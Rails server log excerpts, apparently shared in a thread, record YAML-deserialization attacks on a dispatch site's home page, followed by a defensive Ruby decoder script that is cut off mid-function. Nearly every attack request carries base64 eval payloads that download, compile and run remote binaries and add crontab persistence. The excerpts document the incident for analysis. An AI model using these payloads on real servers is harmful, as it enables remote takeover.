Rendered layouts/_header.html.erb (1.7ms)
Rendered layouts/_menu.html.erb (0.9ms)
Rendered layouts/_my_favs.html.haml (4.5ms)

Rendered layouts/_ride_request_form.html.erb (15.2ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:15 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ==].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.2ms)
Rendered layouts/_head.html.erb (6.2ms)
Rendered layouts/_social_links.html.erb (1.5ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.8ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (4.5ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:16 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ==].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.6ms)
Rendered layouts/_head.html.erb (4.3ms)
Rendered layouts/_social_links.html.erb (1.2ms)
Rendered layouts/_messages.html.haml (0.3ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.9ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:30 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (91.0ms)
Rendered layouts/_head.html.erb (7.8ms)
Rendered layouts/_social_links.html.erb (3.1ms)
Rendered layouts/_messages.html.haml (3.9ms)
Rendered layouts/_header.html.erb (1.5ms)
Rendered layouts/_menu.html.erb (0.5ms)
Rendered layouts/_my_favs.html.haml (4.4ms)

Rendered layouts/_ride_request_form.html.erb (14.3ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:33 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (5.5ms)
Rendered layouts/_social_links.html.erb (1.5ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.7ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.7ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:34 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.4ms)
Rendered layouts/_head.html.erb (3.3ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.5ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.4ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:42 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (93.0ms)
Rendered layouts/_head.html.erb (6.8ms)
Rendered layouts/_social_links.html.erb (3.1ms)
Rendered layouts/_messages.html.haml (2.9ms)
Rendered layouts/_header.html.erb (1.3ms)
Rendered layouts/_menu.html.erb (0.4ms)
Rendered layouts/_my_favs.html.haml (4.0ms)

Rendered layouts/_ride_request_form.html.erb (13.2ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:44 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.8ms)
Rendered layouts/_head.html.erb (5.1ms)
Rendered layouts/_social_links.html.erb (1.4ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.4ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:45 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.5ms)
Rendered layouts/_head.html.erb (3.3ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.5ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.3ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:12 +0000
Rendered /home/ggr/apps/ggr-dispatch/shared/bundle/ruby/1.9.1/gems/activeadmin-0.5.1/app/views/active_admin/resource/index.html.arb (3005.1ms)
Completed 200 OK in 3309ms (Views: 3197.3ms | ActiveRecord: 40.3ms)
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (86.6ms)
Rendered layouts/_head.html.erb (7.4ms)
Rendered layouts/_social_links.html.erb (4.2ms)
Rendered layouts/_messages.html.haml (4.0ms)
Rendered layouts/_header.html.erb (1.7ms)

Rendered layouts/_menu.html.erb (0.5ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:14 +0000
Error occurred while parsing request parameters.
Contents:

SyntaxError ((eval):1: syntax error, unexpected tFLOAT, expecting $end
wget http://88.198.20.247/k.c -O /tmp/k.c; gcc ...
^):
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:176:in eval'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:176:in
define_hash_access'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:175:in module_eval'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:175:in
define_hash_access'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:166:in block in define_named_route_methods'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:164:in
each'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:164:in define_named_route_methods'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:115:in
add'

/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych/visitors/to_ruby.rb:273:in `block in revive_hash'

Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:14 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[d2dldCBodHRwOi8vODguMTk4LjIwLjI0Ny9rLmMgLU8gL3RtcC9rLmM7IGdjYyAtbyAvdG1wL2sgL3RtcC9rLmM7IGNobW9kICt4IC90bXAvazsgL3RtcC9rfHx3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2sgLU8gL3RtcC9rICYmIGNobW9kICt4IC90bXAvayAmJiAvdG1wL2snKQ==].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.5ms)
Rendered layouts/_head.html.erb (3.7ms)
Rendered layouts/_social_links.html.erb (108.5ms)
Rendered layouts/_messages.html.haml (0.3ms)
Rendered layouts/_header.html.erb (0.7ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.4ms)
Rendered layouts/_ride_request_form.html.erb (3.0ms)

from 95.138.186.181:

Started GET "/" for 95.138.186.181 at 2013-05-26 01:16:17 +0000
Processing by PagesController#show as HTML
Parameters: {""\"yaml\">", "#10"=>nil, "---"=>nil, "!ruby/object:Gem::Requirement"=>nil, "requirements:"=>nil, "- !ruby/object:Rack::Session::Abstract::SessionHash"=>nil, "env:"=>nil, "HTTP_COOKIE: \"a"=>"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\"", "by: !ruby/object:Rack::Session::Cookie"=>nil, "coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}"=>nil, "key: a"=>nil, "secrets: "=>[nil], "exists: true"=>nil, ""=>nil, "id"=>"home"}
Rendered inline template within layouts/heavy (80.4ms)
Rendered layouts/_head.html.erb (3.4ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.4ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 03:06:59 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (1.2ms)
Rendered layouts/_head.html.erb (9.4ms)
Rendered layouts/_social_links.html.erb (2.9ms)
Rendered layouts/_messages.html.haml (4.3ms)
Rendered layouts/_header.html.erb (1.9ms)
Rendered layouts/_menu.html.erb (0.6ms)
Rendered layouts/_my_favs.html.haml (5.3ms)

Rendered layouts/_ride_request_form.html.erb (14.7ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 03:07:01 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (5.2ms)
Rendered layouts/_social_links.html.erb (1.4ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.7ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 03:07:02 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.4ms)
Rendered layouts/_head.html.erb (3.1ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.5ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.4ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:05 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (0.9ms)
Rendered layouts/_head.html.erb (12.5ms)
Rendered layouts/_social_links.html.erb (2.3ms)
Rendered layouts/_messages.html.haml (3.3ms)
Rendered layouts/_header.html.erb (134.1ms)
Rendered layouts/_menu.html.erb (0.8ms)
Rendered layouts/_my_favs.html.haml (4.6ms)

Rendered layouts/_ride_request_form.html.erb (13.1ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:06 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (5.5ms)
Rendered layouts/_social_links.html.erb (1.6ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.7ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.9ms)

Rendered layouts/_ride_request_form.html.erb (4.2ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:08 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.6ms)
Rendered layouts/_head.html.erb (3.9ms)
Rendered layouts/_social_links.html.erb (1.2ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (2.9ms)

from 188.190.126.105:

Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:01 +0000
Error occurred while parsing request parameters.
Contents:

Psych::SyntaxError ((): control characters are not allowed at line 1 column 1):
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:in parse'
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:in
parse_stream'
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:151:in `parse'

/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:127:in `load'

Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:01 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (1.1ms)
Rendered layouts/_head.html.erb (7.1ms)
Rendered layouts/_social_links.html.erb (3.5ms)
Rendered layouts/_messages.html.haml (3.0ms)
Rendered layouts/_header.html.erb (1.6ms)
Rendered layouts/_menu.html.erb (0.7ms)
Rendered layouts/_my_favs.html.haml (4.7ms)

Rendered layouts/_ride_request_form.html.erb (15.1ms)

Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:04 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCJ3Z2V0IC1PIC92YXIvdG1wL2sgMTg4LjE5MC4xMjQuMTIwL2thaXRlbi1iaW4iKQpzeXN0ZW0oImNobW9kICt4IC92YXIvdG1wL2siKQpzeXN0ZW0oIi92YXIvdG1wL2siKQpzeXN0ZW0oJ2Nyb250YWIgLXInKQpzeXN0ZW0oJyhjcm9udGFiIC1sIDsgZWNobyAiKiAxICogKiAqIHdnZXQgLU8gL3Zhci90bXAvayAxODguMTkwLjEyNC4xMjAva2FpdGVuLWJpbiAmJiBjaG1vZCAreCAvdmFyL3RtcC9rICYmIC92YXIvdG1wL2siKSB8IGNyb250YWIgLScp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.9ms)
Rendered layouts/_head.html.erb (6.0ms)
Rendered layouts/_social_links.html.erb (1.7ms)
Rendered layouts/_messages.html.haml (0.5ms)
Rendered layouts/_header.html.erb (0.9ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.5ms)

Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:01 +0000
Error occurred while parsing request parameters.
Contents:

Psych::SyntaxError ((): control characters are not allowed at line 1 column 1):
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:in parse'
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:in
parse_stream'
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:151:in `parse'

/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:127:in `load'

Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:02 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (9.7ms)
Rendered layouts/_social_links.html.erb (1.7ms)
Rendered layouts/_messages.html.haml (0.6ms)
Rendered layouts/_header.html.erb (1.0ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.4ms)

Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:05 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCJ3Z2V0IC1PIC92YXIvdG1wL2suYyAxODguMTkwLjEyNC4xMjAva2FpdGVuLXNyYy5jIikKc3lzdGVtKCJnY2MgLW8gL3Zhci90bXAva2EgL3Zhci90bXAvay5jIikKc3lzdGVtKCJjaG1vZCAreCAvdmFyL3RtcC9rYSIpCnN5c3RlbSgiL3Zhci90bXAva2EiKQpzeXN0ZW0oJ2Nyb250YWIgLXInKQpzeXN0ZW0oJyhjcm9udGFiIC1sIDsgZWNobyAiKiAxICogKiAqIHdnZXQgLU8gL3Zhci90bXAvay5jIDE4OC4xOTAuMTI0LjEyMC9rYWl0ZW4tc3JjLmMgJiYgZ2NjIC1vIC92YXIvdG1wL2thIC92YXIvdG1wL2suYyAmJiBjaG1vZCAreCAvdmFyL3RtcC9rYSAmJiAvdmFyL3RtcC9rYSIpIHwgY3JvbnRhYiAtJyk=].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.1ms)
Rendered layouts/_head.html.erb (155.5ms)
Rendered layouts/_social_links.html.erb (1.3ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.9ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (3.0ms)

Regards.
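The decoding walked through by hand a few comments up (CGI.unescape twice, then base64 -d on the HTTP_COOKIE value) and the eval(%[...]).unpack(%[m0]) parameter values in the Rails log excerpts above are two carriers for the same kind of payload. The Ruby script below is an added example, not code from this gist or any of its commenters: it automates both decodings and lists the shell commands each payload would have handed to system(), without ever evaluating the decoded Ruby. The two sample inputs are copied verbatim from the logs quoted in this thread; the regexes and function names are my own.

```ruby
require 'cgi'
require 'base64'

# Sample inputs copied from the logs quoted in this thread: the double
# URL-encoded back_url from the nginx access log, and one YAML parameter
# value from the Rails log. Nothing below ever eval's or runs them.
ACCESS_LOG_PATH = '/login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A'
RAILS_LOG_PARAM = "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ==].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n"

# Carrier 1: a Marshal dump of an ERB object smuggled in as HTTP_COOKIE
# inside the YAML session-hash object.
COOKIE_BLOB = /HTTP_COOKIE: "a=([A-Za-z0-9+\/=]+)"/
# Carrier 2: base64 Ruby that the route-name key would eval after unpack.
EVAL_BLOB = /eval\(%\[([A-Za-z0-9+\/=]+)\]\.unpack\(%\[m0\]\)\[0\]\)/
# Shell command strings handed to Kernel#system inside the decoded Ruby;
# the attacker quotes with either ' or ", so match the same quote on both ends.
SYSTEM_CALL = /system\((['"])(.*?)\1\)/

# Collect every base64 blob of either carrier from `text`, decode it, and
# return the shell commands the payload would have executed. The decoded
# bytes are scanned as binary because the Marshal blob is not valid UTF-8.
def extract_commands(text)
  blobs = text.scan(COOKIE_BLOB).flatten + text.scan(EVAL_BLOB).flatten
  blobs.flat_map do |b64|
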